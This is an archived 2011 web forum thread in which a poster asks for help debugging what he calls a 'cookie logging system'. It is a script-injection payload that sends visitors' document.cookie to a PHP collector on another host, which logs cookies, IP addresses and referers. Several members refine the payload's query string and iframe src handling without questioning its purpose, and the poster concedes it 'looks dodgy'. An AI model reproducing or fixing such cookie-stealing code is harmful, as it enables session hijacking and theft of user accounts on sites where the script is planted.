...

View Full Version : Anyone please help me - first time poster



gogogo
08-19-2011, 07:42 AM
Hello,

I am trying to implement a cookie logging system between my two sites using javascript/php and have a fair bit of experience but this is killing me:

I have this in one my my sites pages:

<IFRAME WIDTH=500 HEIGHT=350 frameborder=0 SRC=javascript:void(document.location="http://www.mysite.com/cookie.php?c"+document.cookie)></iframe>

at mysite.com the php file has the following code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.theothersite.com");
?>


Everything logs other than the cookies. I tested that document.cookies is accessible from the site with <script>alert(document.cookie)</script> and it pops up with a cookie contents.

Why would this not pass the cookie?

(caveat: Although this looks dodgy I do have legitimate reasons for needing this).

Cheers,

Bruce

BluePanther
08-19-2011, 08:54 AM
I'm not entirely sure, but shouldn't your iframe link to "http://www.mysite.com/cookie.php?c="+document.cookie? You're missing that = at the end of the URL string.

gogogo
08-19-2011, 06:54 PM
I'm not entirely sure, but shouldn't your iframe link to "http://www.mysite.com/cookie.php?c="+document.cookie? You're missing that = at the end of the URL string.

Hi thanks for replying, you don't need to add the = as far as I know for php to pickup the syntax. In any case it still doesnt work, anymore suggestions?

venegal
08-19-2011, 07:37 PM
You definitely need the = — otherwise how would PHP know where the key ends and the value begins?

Anyway, that javascript:void thing in the src attribute is no good. There's no way to assure that every browser will do what you expect (I just ran a little test: Chrome does, IE doesn't).

Just do it the clean way, and use DOM manipulation to set the src on page load, and you'll be fine.

Also, using encodeURIComponent on the cookie before putting it into the query string can't be a bad idea.

tangoforce
08-19-2011, 07:40 PM
Hi thanks for replying, you don't need to add the = as far as I know for php to pickup the syntax. In any case it still doesnt work, anymore suggestions?

I beg to differ.
javascript:void(document.location="http://www.mysite.com/cookie.php?c"+document.cookie)>

$cookie = $_GET['c'];

How do you expect PHP to parse the query string and put the cookie value into $_GET['c'] if it has no = symbol to parse the string by? - It also needs & between different variables too :rolleyes:

gogogo
08-19-2011, 08:06 PM
You definitely need the = — otherwise how would PHP know where the key ends and the value begins?

Anyway, that javascript:void thing in the src attribute is no good. There's no way to assure that every browser will do what you expect (I just ran a little test: Chrome does, IE doesn't).

Just do it the clean way, and use DOM manipulation to set the src on page load, and you'll be fine.

Ok, I see. I have changed the code to this, yet still to no avail:

<iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>
<script>
frames["log"].location.href="http://www.xxx.com/cookie.php?c=" + document.cookie;
</script>


I used <script></script> because testing the return of cookie via <script>alert(document.cookie)</script> did work reassuring me that I am on the right tracks with making use of these tags. I really have no idea when it comes to DOM manupulation, particularly in the context of using iframes, any further help would be gratefully received.

gogogo
08-19-2011, 08:12 PM
I beg to differ.
javascript:void(document.location="http://www.mysite.com/cookie.php?c"+document.cookie)>

$cookie = $_GET['c'];

How do you expect PHP to parse the query string and put the cookie value into $_GET['c'] if it has no = symbol to parse the string by? - It also needs & between different variables too :rolleyes:

Ok thanks for your input. I have spent hours and hours on this, can you look at my post after yours and tell me if you see a problem with it (and the interaction with my php script)



I have now deduced that it is not a problem with the java- it is a problem with how the parameter is being passed. check this out:

<iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>

<script>

cookie=document.cookie

frames["log"].location.href="http://www.xxx.com/cookie.php?c="+cookie;


</script>


The php log doesn't show anything.


<iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>

<script>



frames["log"].location.href="http://www.xxx.com/cookie.php?c=hello"


</script>


The log still doesnt show anything.



<iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>

<script>



frames["log"].location.href="http://www.xxx.com/cookie.php?"


</script>


The log shows everything (ip, referer etc) EXCEPT the cookie (which is correct). But that means the passing of the parameter c using php?c= is not compatable with the PHP receiving script. Why is that?

venegal
08-19-2011, 08:30 PM
frames["log"].location.href="http://www.xxx.com/cookie.php?c=" + document.cookie;


I meant "set the src" as in

document.getElementById('log').src = "http://www.xxx.com/cookie.php?c=" + document.cookie;

gogogo
08-19-2011, 08:42 PM
I meant "set the src" as in

document.getElementById('log').src = "http://www.xxx.com/cookie.php?c=" + document.cookie;



Ok I recognise that as a good solution, I tried it with the following:


<iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>

<script>
document.getElementById('log').src = "http://www.xxx.com/cookie.php?c=" + document.cookie;
</script>


yet my php log doesn't receive anything (actually it doesn't record the ip etc.. either) hmm.


I even simplified it by doing:



<iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>

<script>
document.getElementById('log').src = "http://www.xxx.com/cookie.php"
</script>

And the log showed nothing- the usage must be wrong (sorry if this my fault).


Going back to this usage:



<iframe frameborder=0 src="" height=0 width=0 id="log" name="log"></iframe>

<script>
frames["log"].location.href="http://www.xxx.com/cookie.php"
</script>


It does work in terms of ip and referer- something must be happening to the 'c' paramater- god damn it! lol

tangoforce
08-19-2011, 09:04 PM
you don't need to add the = as far as I know for php to pickup the syntax.



I have now deduced that it is not a problem with the java- it is a problem with how the parameter is being passed.

Seriously, you're so good at this PHP stuff that I don't think I need to help you out here to be honest so I'll wish you well and stop assisting you.

gogogo
08-19-2011, 09:06 PM
Seriously, you're so good at this PHP stuff that I don't think I need to help you out here to be honest so I'll wish you well and stop assisting you.

Hello, this is only my second week learning php, did you mean that honestly or sarcastically? Sorry about my English I am learning that too!

EDIT: ok I read the quotes you highlighted so I seem to have upset you because I appeared to try to show that I know more than I actually do- that was not my intention, I tried to be forthright with what I found out to help find the solution. Please don't stop assisting me !

tangoforce
08-19-2011, 09:17 PM
No, you were suggesting that YOU had identified the problem with the way you're passing data. The reality is that WE had been telling you and you attempted to suggest that you knew best and we must be wrong. We're here to help, not to try and score points from each other.

gogogo
08-19-2011, 09:20 PM
No, you were suggesting that YOU had identified the problem with the way you're passing data. The reality is that WE had been telling you and you attempted to suggest that you knew best and we must be wrong. We're here to help, not to try and score points from each other.


Ok I conceded that the "=" is necessary and thanked the correction. I then proved with examples how I 'deduced' that there was a problem passing the paramater- and nobody corrected me on this. This proof didn't undermine any of the previous help given I don't think- I am using the code that was provided. How am I upset you?

tangoforce
08-19-2011, 09:28 PM
In your script do this:

var_dump($_GET);

Please post the result.

gogogo
08-19-2011, 09:36 PM
In your script do this:

var_dump($_GET);

Please post the result.

There is a problem with my webserver at the moment so I can't edit my php file yet- once it is up and running I will be back! If you are available that will be great, but if not I thank you for all your help so far, I really didn't mean anything bad.

gogogo
08-19-2011, 09:52 PM
In your script do this:

var_dump($_GET);

Please post the result.

ok so this is the reply:

Cookie: < br > IP: xxx.xx.xxx.xx < br > Date and Time: 19 August, 2011, 3:50 pm< br > Referer: http://www.xxx.com< br > < br > < br > stats


My php looks like this:



<?php
var_dump($_GET);
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date.

'< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.xxx.com");
?>

tangoforce
08-19-2011, 10:05 PM
Cookie: < br > IP: xxx.xx.xxx.xx < br > Date and Time: 19 August, 2011, 3:50 pm< br > Referer: http://www.xxx.com< br > < br > < br > stats


Thats not the output from var_dump().

You should be posting that thing that looks like:

array([0] string "something")

gogogo
08-19-2011, 10:24 PM
Thats not the output from var_dump().

You should be posting that thing that looks like:

array([0] string "something")

ok, it is this:

array(0) { }


by going directly to cookie.php

tangoforce
08-19-2011, 10:31 PM
Now why are you going to it directly? - You NEED to be calling it with your cookie parameter on the end.

That is why we are var_dump()'in it.. to see what the $_GET array holds.

You said earlier:


I am trying to implement a cookie logging system between my two sites using javascript/php and have a fair bit of experience but this is killing me:


So what is the problem? You know what var_dump() is, you know what it does, you know how you should be using it in this scenario correct? So why are you now calling the script directly when you know that $_GET will not be set and therefore will output nothing?

gogogo
08-19-2011, 10:35 PM
Now why are you going to it directly? - You NEED to be calling it with your cookie parameter on the end.

That is why we are var_dump()'in it.. to see what the $_GET array holds.

You said earlier:


So what is the problem? You know what var_dump() is, you know what it does, you know how you should be using it in this scenario correct? So why are you now calling the script directly when you know that $_GET will not be set and therefore will output nothing?



Ok, so here are the results:

http://xxx.com/cookie.php?c gives:


array(1) { ["c"]=> string(0) "" } stats

http://xxx.com/cookie.php?c=1 gives:


gives no result. The page just takes a while to load and doesn't show anything.

http://xxx5.com/cookie.php?c=hello

likewise.

sorry that was stupid.

tangoforce
08-19-2011, 11:03 PM
Hmm.. thats weird. Clearly PHP is installed, enabled and running as its var_dumping blank arrays..

This almost sounds like a session problem with a session not being closed but you've not mentioned those..

I think you need to start logging the process flow and see whats going on after each run.



EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum